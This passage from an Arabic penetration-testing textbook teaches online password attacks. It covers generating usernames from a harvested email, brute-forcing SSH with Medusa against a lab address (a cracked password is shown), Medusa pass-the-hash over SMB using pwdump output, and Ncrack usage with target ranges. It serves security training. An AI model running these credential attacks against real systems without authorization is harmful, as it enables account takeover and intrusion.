‫إذا ﻛﺎﻧت ﻣﻛﺎﻓﺄة ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع اﻟﺧﺎص ﺑك ھﻲ ﻗﺎﺋﻣﺔ ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬ﻓﻘد ﺗرﯾد أن ﺗﺑدأ ﻣﻊ ھؤﻻء‪ .‬إذا ﻛﻧت ﻟم ﺗﻧﺟﺢ ﻓﻲ ﺟﻣﻊ أﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﻘد ﺗرﻏب ﻓﻲ اﻟﺗرﻛﯾز ﻋﻠﻰ اﻟﻧﺗﺎﺋﺞ ﻣن ﻋﻧﺎوﯾن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﻣﻊ ‪ .harvester‬ﺗذﻛر‪ ،‬ﯾﻣﻛن‬
‫ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن أن اﻟﺟزء اﻷول ﻣن ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮫ ﻓﻲ ﺗوﻟﯾد اﺳم اﻟﻣﺳﺗﺧدم ﻟدوﻣﯾن‪.‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬اﻓﺗرض أﻧﮫ ﺧﻼل اﺧﺗﺑﺎر اﻻﺧﺗراق اﻟﺧﺎص ﻟم ﺗﺗﻣﻛن ﻣن اﻟﻌﺛور ﻋﻠﻰ أي ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن ﻟﻠدوﻣﯾن‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻛﻧت‬
‫ﻗﺎدرا ﻋﻠﻰ ﻧﺑش ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ . [email protected]‬ﻋﻧد اﺳﺗﺧدام ﻣﯾدوﺳﺎ‪ ،‬ﯾوﺟد ﺧﯾﺎر وھو إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻷﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﺗﻣﻠﯾن اﺳﺗﻧﺎدا إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ .‬وﺗﺷﻣل ھذه ‪ ،ownedb ،bowned ،benowned ،ben.owned‬وﻋدة‬
‫ﻣﺟﻣوﻋﺎت أﺧرى ﻣﺷﺗﻘﺔ ﻣن ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ .‬ﺑﻌد إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن ‪ 10-5‬أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬ﻓﻣن اﻟﻣﻣﻛن ﺗﻐذﯾﺔ ھذه اﻟﻘﺎﺋﻣﺔ اﻟﻰ‬
‫ﻣﯾدوﺳﺎ وﻣﺣﺎوﻟﺔ دﻓﻊ ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪ (brute force attack‬اﻟﻰ طرﯾﻖ ﺧدﻣﺔ اﻟﻣﺻﺎدﻗﺔ ﻋن ﺑﻌد‪.‬‬

‫اﻵن ﺑﻌد أن أﺻﺑﺢ ﻟدﯾﻧﺎ ﻋﻧوان ‪ IP‬ﻟﻠﮭدف ﻣﻊ ﺑﻌض اﻟﺧدﻣﺎت اﻟﻣﺻﺎدﻗﺔ ﻋن ﺑﻌد اﻟﻣﺻﺎدﻗﺔ )ﺳوف ﻧﻔﺗرض ‪SSH‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل(‪ ،‬ﻗﺎﻣوس‬
‫ﻛﻠﻣﺔ اﻟﻣرور واﺳم ﻣﺳﺗﺧدم واﺣد ﻋﻠﻰ اﻷﻗل‪ ،‬ﻓﻧﺣن ﻋﻠﻰ اﺳﺗﻌداد ﻟﺗﺷﻐﯾل ﻣﯾدوﺳﺎ‪ .‬ﻣن أﺟل ﺗﻧﻔﯾذ اﻟﮭﺟوم‪ ،‬ﯾﻣﻛﻧك ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وإﺻدار اﻷﻣر‬
‫اﻟﺗﺎﻟﻲ‪:‬‬

‫‪#medusa –h target_ip –u username –P path_to_password_dictionary –M authentication_service_to_attack‬‬

‫ﻧﺗوﻗف ﻟﺣظﺔ ھﻧﺎ ﻟدراﺳﺔ ھذا اﻷﻣر ﻣﻊ ﻣزﯾد ﻣن اﻟﺗﻔﺎﺻﯾل؛ ﺳوف ﻧﺣﺗﺎج إﻟﻰ ﺗﺧﺻﯾص اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﮭدف اﻟﺧﺎص ﺑك‪:‬‬
‫ﺣﯾث ﯾﺗم اﺳﺗﺧدام اﻟﻛﻠﻣﺔ اﻷوﻟﻰ "‪ " medusa‬ﻟﺑدء ﺑرﻧﺎﻣﺞ ‪ .brute forcing‬ﯾﺗم اﺳﺗﺧدام "‪ "-h‬ﻟﺗﺣدﯾد ﻋﻧوان ‪ IP‬ﻟﻠﻣﺿﯾف اﻟﮭدف‪ .‬ﯾﺗم‬
‫اﺳﺗﺧدام "‪ "-u‬ﻟﻠدﻻﻟﺔ ﻋﻠﻰ اﺳم ﻣﺳﺗﺧدم واﺣد اﻟﺗﻲ ﺳوف ﺗﺳﺗﺧدﻣﮫ ﻣﯾدوﺳﺎ ﻟﻣﺣﺎوﻟﺔ ﺗﺳﺟﯾل اﻟدﺧول‪ .‬إذا ﻗﻣت ﺑﺈﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن أﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﺗرﻏب ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﻠدﺧول ﻣﻊ ﻛل ﻣن اﻷﺳﻣﺎء اﻟواردة ﻓﻲ اﻟﻘﺎﺋﻣﺔ‪ ،‬ﯾﻣﻛﻧك إﺻدار اﻟﺗﻌﺑﯾر "‪ " -U‬ﻣﺗﺑوﻋﺎ ﺑﻣﺳﺎر اﻟﻣﻠف اﻟذي‬
‫ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﮫ ﺑﺄﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬وﺑﺎﻟﻣﺛل‪ ،‬ﯾﺗم اﺳﺗﺧدام "‪ "-p‬ﻟﺗﺣدﯾد ﻛﻠﻣﺔ ﻣرور واﺣدة‪ ،‬ﻓﻲ ﺣﯾن ﯾﺗم اﺳﺗﺧدام "‪ "-P‬ﻟﺗﺣدﯾد ﻗﺎﺋﻣﺔ ﺗﺣﺗوي‬
‫ﻋﻠﻰ اﻟﻌدﯾد ﻣن ﻛﻠﻣﺎت اﻟﻣرور‪ "-P" .‬ﯾﺟب أن ﺗﻛون ﻣﺗﺑوﻋﺔ ﺑﺎﻟﻣوﻗﻊ اﻟﻔﻌﻠﻲ أو ﻣﺳﺎر ﻟﻣﻠف اﻟﻘﺎﻣوس‪ .‬ﯾﺗم اﺳﺗﺧدام "‪ "-M‬ﻟﺗﺣدﯾد اﻟﺧدﻣﺔ اﻟﺗﻲ‬
‫ﺗرﯾد ﻣﮭﺎﺟﻣﺗﮭﺎ‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام )‪ (-n port_number‬ﻟﺗﺧﺻﯾص رﻗم اﻟﻣﻧﻔذ‪.‬‬
‫ﻟﺗوﺿﯾﺢ ھذا اﻟﮭﺟوم‪ ،‬دﻋوﻧﺎ ﻧﺳﺗﺧدم ھذا اﻟﻣﺛﺎل‪ .‬ﻟﻧﻔﺗرض أﻧﻧﺎ ﻗد ﺗم اﻟﺗﻌﺎﻗد ﻹﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق ﺿد ﺷرﻛﺔ "‪ ."Example.com‬ﺧﻼل‬
‫ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﻟدﯾﻧﺎ ﻣﻊ ‪ ،MetaGoofil‬ﻓﻠﻘد اﻛﺗﺷﻔﻧﺎ ﻋن اﺳم اﻟﻣﺳﺗﺧدم "‪ "ownedb‬وﻋﻧوان ‪ IP‬ﻣن ‪ .192.168.18.132‬وﺑﻌد‬
‫ﻓﺣص اﻟﻣﻧﺎﻓذ اﻟﺧﺎﺻﺔ ﺑﺎﻟﮭدف‪ ،‬ﻧﻛﺗﺷف أن اﻟﻣﻠﻘم ‪ SSH‬ﻗﯾد اﻟﺗﺷﻐﯾل ﻋﻠﻰ اﻟﻣﻧﻔذ ‪ .22‬ﺑﺎﻻﻧﺗﻘﺎل إﻟﻰ اﻟﺧطوة ‪ ،3‬واﺣدة ﻣن أول اﻷﺷﯾﺎء اﻟﻘﯾﺎم ﺑﮫ‬
‫ھو ﻣﺣﺎوﻟﺔ دﻓﻊ ھﺟوم ‪ brute forcing‬ﻓﻲ طرﯾﻘﻧﺎ إﻟﻰ اﻟﻣﻠﻘم‪ .‬ﺑﻌد اﺷﺗﻌﺎل اﻟﺟﮭﺎز ھﺟوﻣﻧﺎ وﻓﺗﺢ ﻣﺣطﺔ‪ ،‬وﻧﺣن ﻹﺻدار اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#medusa –h 192.168.18.132 –u ownedb –P /usr/share/john/password.lst –M ssh‬‬

‫ﻣﻠﺣوظﮫ‪ :‬إذا ﻛﻧت ﺗواﺟﮫ أي ﻣن اﻟﻣﺷﺎﻛل ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻣﯾدوﺳﺎ )أو أي ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﯾﺷﻣﻠﮭﺎ ھذا اﻟﻛﺗﺎب( ﻟﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ‬
‫اﻹﺻدار اﻟﺧﺎص ﺑك ﻣن ﻛﺎﻟﻲ‪ ،‬ﻓﺈﻧﮫ ﻗد ﯾﻛون ﻣن اﻟﻣﻔﯾد إﻋﺎدة ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ‪ .‬ﯾﻣﻛﻧك إﻋﺎدة ﺗﺛﺑﯾت ﻣﯾدوﺳﺎ ﻣﻊ اﻷواﻣر اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪#apt-get remove medusa‬‬
‫‪#apt-get update‬‬
‫‪#apt-get install medusa‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪371‬‬

‫ﯾظﮭر اﻟﺳطر اﻷول اﻷﻣر أﺻدرﻧﺎه ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ ﻣﺛﺎﻟﻧﺎ اﻟﺳﺎﺑﻖ؛ اﻟﺳطر اﻟﺛﺎﻧﻲ ھو راﯾﺔ إﻋﻼﻣﯾﺔ اﻟﺗﻲ ﯾﺗم ﻋرﺿﮭﺎ ﻋﻧدﻣﺎ ﯾﺑدأ اﻟﺑرﻧﺎﻣﺞ‬
‫اﻟﻌﻣل‪ .‬اﻷﺳطر اﻟﻣﺗﺑﻘﯾﺔ ﺗظﮭر ﺳﻠﺳﻠﺔ ﻣن ﻣﺣﺎوﻻت اﻟدﺧول اﻵﻟﻲ ﻣﻊ اﺳم اﻟﻣﺳﺗﺧدم " ‪ " ownedb‬وﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗﺑدأ ب "‬
‫‪ .“ 123456‬ﻻﺣظ ﻓﻲ اﻟﺳطر ‪ 11‬ﺣﯾث ﯾوﺟد إﺷﻌﺎر ﻣﺣﺎوﻟﺔ ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬ﺣﯾث ﻧﺟﺣت ﻣﯾدوﺳﺎ ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻧظﺎم ﺑﺎﺳﺗﺧدام اﺳم‬
‫ﻣﺳﺗﺧدم " ‪" ownedb‬وﻛﻠﻣﺔ ﻣرور)‪ . (Th3B@sics‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﺳﻧﻛون ﻗﺎدرﯾن ﻋﻠﻰ اﻟدﺧول ﺑﺎﺳم اﻟﻣﺳﺗﺧدم ﻋن ﺑﻌد ﻣن ﺧﻼل ﻓﺗﺢ‬
‫اﻟﺗرﻣﻧﺎل واﻟﺗوﺻل إﻟﻰ اﻟﮭدف ﻋن طرﯾﻖ‪. SSH‬‬

‫ﯾﻣﻛﻧك اﯾﺿﺎ ﺗﺣﻣﯾل اﻷداة ﻣن ﺧﻼل اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬


‫‪http://h.foofus.net‬‬
‫اﺳﺘﺨﺪام ‪ Medusa‬ﻓﻲ ﻋﻤﻠﯿﺔ ‪Passing The Hash‬‬

‫ﻟﻘد ﻗﻣﻧﺎ ﻣن ﻗﺑل ﺑﺟﻣﻊ ﻋددا ﻣن ﻣﻠف‪ SAM‬وﻣﻠف ‪ .Pwdump‬ﺣﯾث ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ ﯾﺳﺗطﯾﻊ ‪ Medusa‬ﻗراءة ﻧﺎﺗﺞ ‪PWDump‬‬
‫وﻓﺣص ﻛل ﺣﺳﺎب ﺿد ﻗﺎﺋﻣﺔ ﻣن اﻟﻣﺿﯾﻔﯾن‪ .‬وﻣن اﻟﺟدﯾر ﺑﺎﻟذﻛر أن اﻟﻣﺋﺎت ﻣن اﻟﻧظم اﻟﻛﺛﯾرة ﯾﻣﻛن ﻓﺣﺻﮭﺎ ﻓﻲ ﺑﺿﻊ دﻗﺎﺋﻖ ﻓﻘط ﺑﺎﺳﺗﺧدام ھذا‬
‫اﻟﻧﮭﺞ‪.‬‬
‫‪#medusa -H hosts.txt -C pwdump.txt -M smbnt -m PASS:HASH‬‬

‫ﻟرؤﯾﺔ ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ﺑروﺗوﻛول ﻣﻌﯾن ﻣﻊ ‪ medusa‬ﯾﻣﻛﻧك ذﻟك ﻋن طرﯾﻖ اﺻدار اﻻﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل ﺣﯾث اﺳﺗﺧدﻣﻧﺎ ‪ ssh‬ﻛﻣﺛﺎل‬
‫ﻟﻠﺑروﺗوﻛول اﻟﺗﻲ ﻧرﯾد اﻻﺳﺗﻌﻼم ﻋﻧﮫ‪:‬‬
‫‪#medusa -M smbnt -q‬‬

‫‪Ncrack — Network Authentication Cracking Tool‬‬

‫اﻟﻣﺻدر‪http://nmap.org/ncrack:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪372‬‬

‫‪ Ncrack‬ھﻲ أداة ﻋﺎﻟﯾﺔ اﻟﺳرﻋﺔ ﻓﻲ ﻛﺳر ﻣﺻﺎدﻗﺔ اﻟﺷﺑﻛﺔ‪ .‬ﺗم ﺑﻧﺎؤھﺎ ﻟﻣﺳﺎﻋدة اﻟﺷرﻛﺎت ﻋﻠﻰ ﺗﺄﻣﯾن ﺷﺑﻛﺎﺗﮭم ﻋن طرﯾﻖ اﺧﺗﺑﺎر اﺳﺗﺑﺎﻗﻲ‬
‫ﻟﺟﻣﯾﻊ ﻣﺿﯾﻔﯾﮭم واﻷﺟﮭزة اﻟﻣﻧﺻﺑﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﻣن اﺟل اﻟﻛﺷف ﻋن ﻛﻠﻣﺎت اﻟﺳر اﻟﺿﻌﯾﻔﺔ‪/‬اﻟﺧﺎطﺋﺔ‪ .‬ﯾﻌﺗﻣد اﻟﻣﺗﺧﺻﺻﯾن ﻓﻲ ﻣﺟﺎل اﻷﻣن‬
‫أﯾﺿﺎ ﻋﻠﻰ ‪ Ncrack‬ﻋﻧد ﻓﺣص )‪ (auditing‬ﻋﻣﻼﺋﮭم‪" .‬اﻟﮭﺎﻛرز" أﺻﺑﺣوا اﻟﯾوم ﯾﺳﺗﺧدﻣوﻧﮭﺎ ﺑﺎﻟﺗوازي ﻣﻊ اداة اﻟﻔﺣص ‪ .Nmap‬ﺣﯾث اﻧﮫ‬
‫ﻋﻧد اﻟﻔﺣص ﺑﺄداة ‪ Nmap‬ﯾﻣﻛن ان ﯾﻛﺷف ﻟﻧﺎ ان اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم ھو وﯾﻧدوز ﻣﻊ وﺟود ﺧدﻣﺔ ‪ ssh‬ﻣﻔﺗوﺣﺔ‪ ،‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﺳﺗﻌﯾن اﻟﮭﺎﻛر‬
‫أو ﻣﺧﺗﺑر اﻹﺧﺗراق ﺑﺄدوات اﻟﺗﺧﻣﯾن ﺣول ﻛﻠﻣﺎت اﻟﺳر ﻟﮭذه اﻟﺧدﻣﺎت )اﻟﺑروﺗوﻛوﻻت(‪.‬‬

‫ﻗد ﺗم ﺗﺻﻣﯾم ‪ Ncrack‬ﺑﺎﺳﺗﺧدام ﻧﮭﺞ اﻟوﺣدات)‪ ، (modular approach‬ﺑﻧﺎء ﺟﻣﻠﺔ ﺳطر اﻷواﻣر ﻣﺷﺎﺑﮭﺔ ل ‪ nmap‬وﻣﺣرك ‪Ncrack‬‬
‫)‪(dynamic engine‬اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺗﻛﯾف ﻣﻊ ﺣﺎﻻت اﻟﺷﺑﻛﺔ اﻟﻣﺧﺗﻠﻔﺔ وﺗﻛون ﻗﺎﺋﻣﮫ ﻋﻠﻰ أﺳﺎس اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺔ اﻟﮭدف‪ .‬ﯾﻣﻛن‬
‫اﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧطﺎق واﺳﻊ ﻣن اﻟﻣﺿﯾﻔﯾن اﻟﻣﺗﻌددة‪.‬‬
‫ﯾﺗﻣﯾز ‪ Ncrack‬ﺑواﺟﮭﺔ ﻣرﻧﺔ ﻟﻠﻐﺎﯾﺔ ﻟﻣﻧﺢ اﻟﺗﺣﻛم اﻟﻛﺎﻣل ﻟﻠﻣﺳﺗﺧدم ﻓﻲ ﻋﻣﻠﯾﺎت اﻟﺷﺑﻛﺔ‪ ،‬اﻟﺳﻣﺎح ل ھﺟﻣﺎت ‪ brute forcing‬اﻟﻣﺗطورة‬
‫واﻟﻣﻛﺛﻔﺔ ﻟﻠﻐﺎﯾﺔ‪ ،‬ﯾوﺟد ﻗواﻟب اﻟﺗوﻗﯾت )‪ (timing templates‬ﻟﺳﮭوﻟﺔ اﻻﺳﺗﺧدام‪ ،‬اﻟﺗﻔﺎﻋل وﻗت اﻟﺗﺷﻐﯾل ﻣﺛل ‪ Nmap‬وﻏﯾرھﺎ ﻣن اﻟﻛﺛﯾر ﻣن‬
‫اﻟﻣﻣﯾزات‪ .‬ﺗﺷﻣل اﻟﻌدﯾد ﻣن اﻟﺑروﺗوﻛوﻻت ﻛﺎﻻﺗﻰ‪:‬‬
‫‪RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet‬‬
‫ﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻣﻌﺎﻣﻼت اﻻﻓﺗراﺿﯾﺔ )‪ (default parameter‬ھﻲ ﻋﺎﻣﺔ ﻛﺎﻓﯾﺔ ﻟﺗﻐطﯾﺔ ﻛل اﻟﺣﺎﻻت ﺗﻘرﯾﺑﺎ‪ .‬ﻟﻛﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ وﺣدات‬
‫اﻟﮭﻧدﺳﺔ اﻟﻣﻌﻣﺎرﯾﺔ )‪ (modular architecture‬اﻟﺗﻲ ﺗﺳﻣﺢ ﺑﺗﻣدﯾد اﻟدﻋم ﻟﺑروﺗوﻛوﻻت إﺿﺎﻓﯾﺔ ﻏﯾر اﻟﻣدرﺟﺔ ﺑﺳﮭوﻟﮫ‪.‬‬
‫ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﻰ ھذه اﻷداة واﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺟﻣﯾﻊ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑﻣﺎ ﻓﻲ ذﻟك اﻟوﯾﻧدوز وذﻟك ﻣن ﺧﻼل زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://nmap.org/ncrack/‬‬
‫ھذه اﻷداة ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ وﯾﻣﻛن اﻟوﺻول اﻟﯾﮭﺎ ﺑﺎﺗﺑﺎع اﻻﺗﻲ‪:‬‬
‫‪Applications | Kali Linux | Password Attacks | Online Attacks | Ncrack.‬‬
‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻻﺳﺗﺧدام ھذه اﻷداة ﻛﺎﻻﺗﻰ‪:‬‬
‫}>‪#ncrack [<Options>] {<target specification‬‬
‫ﻣﺛﺎل ﻻﺳﺗﺧدام ھذا اﻻﻣر ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ ncrack‬ﺑدون أي ﻣن اﻟﻣﻌﺎﻣﻼت ﻓﺳوف ﯾﻘوم ﺑﻌرض ﺟﻣﯾﻊ اﻟﻣﻌﺎﻣﻼت اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻌﮫ أﺷﮭر ھذه‬
‫اﻟﻣﻌﺎﻣﻼت ﻛﺎﻻﺗﻰ‪:‬‬
‫)‪ :(-U‬ﻣﻠف اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬
‫)‪ :(-P‬ﻣﻠف ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫)‪ :(--user‬اﺳم اﻟﻣﺳﺗﺧدم اﻟدى ﺗم ﺗﺧﻣﯾﻧﮫ ﺑﻧﺟﺎح‪.‬‬
‫)‪ :(--pass‬ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧﻣﯾﻧﮭﺎ ﺑﻧﺟﺎح‪.‬‬
‫)‪ :(--password-first‬ﻛرر اﻟﺗﺧﻣﯾن ﻟﻛل ﻣﺳﺗﺧدم ﻣن ﺧﻼل ﻣﻠف ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫)‪ :(-V‬ﻟﻠﺗﻌرف ﻋﻠﻰ اﺻدار اﻟﺗطﺑﯾﻖ‪.‬‬
‫)‪ :(-f‬اﻟﺗوﻗف اذا ﺗم إﯾﺟﺎد ﻛﻠﻣﺔ اﻟﻣرور واﺳم اﻟﻣﺳﺗﺧدم اﻟﺻﺣﯾﺣﺔ‪.‬‬
‫)‪ :(-6‬ﻟﺗﻔﻌﯾﺎ ﻓﺣص اﻟﻌﻧﺎوﯾن ﻣن اﻟﻧوع ‪.IPv6‬‬
‫‪Target Specification‬‬
‫ﯾﺗم اﻟﺗﻌﺎﻣل ﻣﻊ ﻛل ﺷﻲء ﻓﻲ ﺳطر أواﻣر ‪ Ncrack‬اﻟﺗﻲ ھﻲ ﻟﯾﺳت ﺧﯾﺎرا )‪ (options‬ﻋﻠﻰ اﻧﮫ اﻟﻣﺿﯾف اﻟﮭدف‪ .‬أﺑﺳط ﺷﻲء ھو ﺗﺣدﯾد‬
‫ﻋﻧوان ‪ IP‬ﻟﻠﮭدف أو اﺳم ﻣﺿﯾف‪ .‬ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻟﻠﮭﺟوم ﻋﻠﻰ اﻷھداف اﻟﻣﺧﺗﺎرة‪ Ncrack .‬ﻣرن ﺟدا ﻓﻲ ﺗﻌرﯾﻔﮫ ﻟﻠﻣﺿﯾف‬
‫‪/‬اﻟﺧدﻣﺔ ﻣﺛل اﻟﺗﻲ ﺗﺳﺗﺧدم ﻣﻊ ‪.Nmap‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪373‬‬

‫‪ Ncrack‬ﯾدﻋم ﺗﻌرﯾف اﻛﺛر ﻣن ﻣﺿﯾف )‪ (multi hosts‬وﻻ ﯾﺷﺗرط ان ﯾﻛون ﻣن ﻧﻔس اﻟﻧوع وﯾدﻋم أﯾﺿﺎ ﻧطﺎق اﻟﺷﺑﻛﺎت و ﯾدﻋم أﯾﺿﺎ‬
‫‪ CIDR-style addressing‬واﻟﺗﻲ ﺳوف ﻧراه ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪.‬‬
‫‪#ncrack scanme.nmap.org 192.168.0.0/8 10.0.0,1,3-7.- -p22‬‬
‫وﻟﻛن ﯾوﺟد ﺑﻌض اﻟﻣﻌﺎﻣﻼت اﻟﺗﻲ ﯾﻣﻛن اﻟﺗﺣﻛم ﻓﻲ ﺗﻌرﯾف ‪ Ncrack‬ﻟﻠﻣﺿﯾﻔﯾن ﻛﺎﻻﺗﻰ‪:‬‬
‫)‪-iX <inputfilename> (Input from Nmap's -oX XML output format‬‬
‫ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف واﻟﺗﻲ ﺗﻛون ﻧﺎﺗﺞ اﻻﻣر ‪ Nmap‬ﻓﻲ ﺻورة ‪.xml‬‬
‫)‪-iN <inputfilename> (Input from Nmap's -oN Normal output format‬‬
‫ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف واﻟﺗﻲ ﺗﻛون ﻧﺎﺗﺞ اﻻﻣر ‪ Nmap‬ﻓﻲ ﺻورﺗﮫ اﻟﻌﺎدﯾﺔ‪.‬‬
‫)‪-iL <inputfilename> (Input from list‬‬
‫ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف اﻟﻣوﺟودة ﻓﻲ اﻟﻣﻠف اﻟﻣﺣدد‪.‬‬
‫)‪--exclude <host1>[, <host2>[, ...]] (Exclude hosts/networks‬‬
‫ﯾﺳﺗﺧدم ھذا اﻟﺗﻌﺑﯾر ﻟﻣﻧﻊ ﻗﺎﺋﻣﮫ ﻣن اﻟﻣﺿﯾﻔﯾن‪.‬‬
‫)‪--excludefile <exclude_file> (Exclude list from file‬‬
‫ﯾﺳﺗﺧدم ھذا اﻟﺗﻌﺑﯾر ﻟﻣﻧﻊ ﻗﺎﺋﻣﮫ ﻣن اﻟﻣﺿﯾﻔﯾن واﻟﺗﻲ ﺗﻛون ﻣﺗوﻓرة ﻓﻲ ﻣﻠف‪.‬‬
‫‪Service Specification‬‬
‫ﯾﻣﻛن إﺟراء أي ﺟﻠﺳﺔ اﺧﺗراق ﻣﻊ اﻟﮭدف ﻣن دون ﺗﻛﺳﯾر ﺧدﻣﺔ ﻣﻌﯾﻧﺔ ﻟﻣﮭﺎﺟﻣﺗﮫ‪ .‬ﺗﻌرﯾف اﻟﺧدﻣﺔ ھﻲ واﺣدة ﻣن اﻟﻧظم اﻟﻔرﻋﯾﺔ اﻷﻛﺛر ﻣروﻧﺔ‬
‫ﻣن ‪ Ncrack‬ﺣﯾث ﯾﺗﻌﺎون ﻣﻊ ﺗﻌرﯾف اﻟﻣﺳﺗﮭدﻓﺔ ﺑطرﯾﻘﺔ ﺗﺳﻣﺢ ﻟﺗرﻛﯾب ﺧﯾﺎرات ﻣﺧﺗﻠﻔﺔ ﻟﯾﺗم ﺗطﺑﯾﻘﮭﺎ‪ .‬ﻟﺑدء ﺗﺷﻐﯾل ‪ ،Ncrack‬ﻓﺈﻧك ﺳوف‬
‫ﺗﺣﺗﺎج ﻋﻠﻰ اﻻﻗل ﺗﺣدﯾد ﻣﺿﯾف واﺣد ورﺑطﮫ ﺑﺧدﻣﺔ واﺣدة ﻟﻠﮭﺟوم‪ .‬ﯾوﻓر ‪ Ncrack‬طرق ﻟﺗﺣدﯾد اﻟﺧدﻣﺔ ﻋن طرﯾﻖ رﻗم اﻟﻣﻧﻔذ اﻻﻓﺗراﺿﻲ‬
‫اﻟﺧﺎص ﺑﮫ‪ ،‬او ﻣن ﺧﻼل اﺳﻣﮭﺎ )ﻛﻣﺎ ھﻲ ﻣﺳﺗﺧرﺟﺔ ﻓﻲ اﻟﻣﻠف‪ (ncrack-services‬أو ﻛﻠﯾﮭﻣﺎ‪ .‬ﻋﺎدة‪ ،‬ﺗﺣﺗﺎج إﻟﻰ ﺗﻌرﯾف ﻛل ﻣن اﺳم ورﻗم‬
